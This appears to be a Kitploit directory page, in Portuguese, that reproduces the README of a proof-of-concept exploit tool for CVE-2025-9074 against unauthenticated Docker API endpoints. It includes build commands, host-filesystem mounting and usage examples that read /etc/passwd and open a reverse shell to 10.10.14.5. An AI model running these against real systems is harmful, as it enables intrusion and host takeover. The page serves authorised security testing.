Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
poc-2025-9074 — Docker API CVE-2025-9074 PoC (Prova de Conceito). Um sofisticado framework de exploração para CVE-2025-9074, direcionando endpoints não autenticados da API Docker com um shell de comando interativo integrado. | Kitploit
Ferramentas/GitHubGitHub/xwpdx0/poc-2025-9074
Segurança de Infraestrutura em NuvemEscalada de PrivilégiosScanners de VulnerabilidadesSegurança de ContêineresFrameworks de ExploraçãoExploraçãoPós-ExploraçãoTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHub
41há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
xwpdx0/poc-2025-9074

poc-2025-9074

Docker API CVE-2025-9074 PoC (Prova de Conceito). Um sofisticado framework de exploração para CVE-2025-9074, direcionando endpoints não autenticados da API Docker com um shell de comando interativo integrado.

Ver Repositório

CVE-2025-9074 | Docker API CVE-2025-9074 PoC (Prova-de-Conceito)

Um sofisticado framework de exploração para CVE-2025-9074, visando endpoints da API Docker não autenticados com um shell de comandos interativo integrado.

Language Platform License

Visão Geral

Esta ferramenta automatiza a exploração de instâncias da API Docker expostas sem autenticação, permitindo a criação completa de contêineres e execução de comandos no host alvo. A ferramenta possui um shell interativo personalizado para operações de pós-exploração sem interrupções.

Nota: Esta é uma implementação de PoC personalizada. Não descobri o CVE-2025-9074.

Demonstração

Exploração Inicial

Exploitation Process

Detecção automatizada de vulnerabilidades, pull de imagem, criação e inicialização de contêiner

Execução Interativa de Comandos

Command Execution

Shell de pós-exploração com capacidades de execução de comandos

Principais Capacidades

  • Varredura automatizada de vulnerabilidades da API Docker
  • Implantação de contêiner com montagem do sistema de arquivos do host
  • Shell interativo de pós-exploração
  • Interface de execução remota de comandos
  • Módulo de implantação de reverse shell
  • Saída de terminal colorida para melhor visibilidade

Instalação

  1. Clone o repositório
root@kitploit:~
git clone https://github.com/xwpdx0/poc-2025-9074
  1. Compile o código
root@kitploit:~
gcc poc.c -o poc-2025-9074

ou você pode baixar o binário de Releases

Uso

root@kitploit:~
./poc-2025-9074

Alvo Padrão

Execute contra o alvo padrão (127.0.0.1:2375):

root@kitploit:~
./poc-2025-9074

Alvo Personalizado

Especifique um endpoint personalizado da API Docker:

Custom Target

Shell Interativo

Após exploração bem-sucedida, um shell interativo fornece os seguintes comandos:

ComandoDescrição
cmd <comando>Executa comandos arbitrários dentro do contêiner
revshell <ip> <porta>

Exemplos de Uso

root@kitploit:~
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info

Detalhes da Vulnerabilidade

CVE-2025-9074 afeta instâncias do Docker com endpoints de API expostos que carecem de mecanismos de autenticação adequados. Essa configuração incorreta permite acesso não autorizado ao daemon do Docker, possibilitando:

  • Criação arbitrária de contêineres
  • Acesso ao sistema de arquivos do host via montagens bind
  • Oportunidades de escalonamento de privilégios
  • Execução remota de código

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizados.

  • Use apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar
  • Acesso não autorizado a sistemas de computador é ilegal e punível por lei
  • O autor não assume responsabilidade por uso indevido ou danos causados por esta ferramenta
  • Os usuários são os únicos responsáveis pelo cumprimento das leis e regulamentos aplicáveis

Autor

xwpd (@xwpdx0)

Licença

Licença MIT - Consulte o arquivo LICENSE para detalhes


Apenas para fins de divulgação responsável e pesquisa de segurança.

Baixar ferramenta
Implanta um reverse shell para um listener especificado
infoExibe informações atuais do contêiner e do alvo
exitEncerra a sessão interativa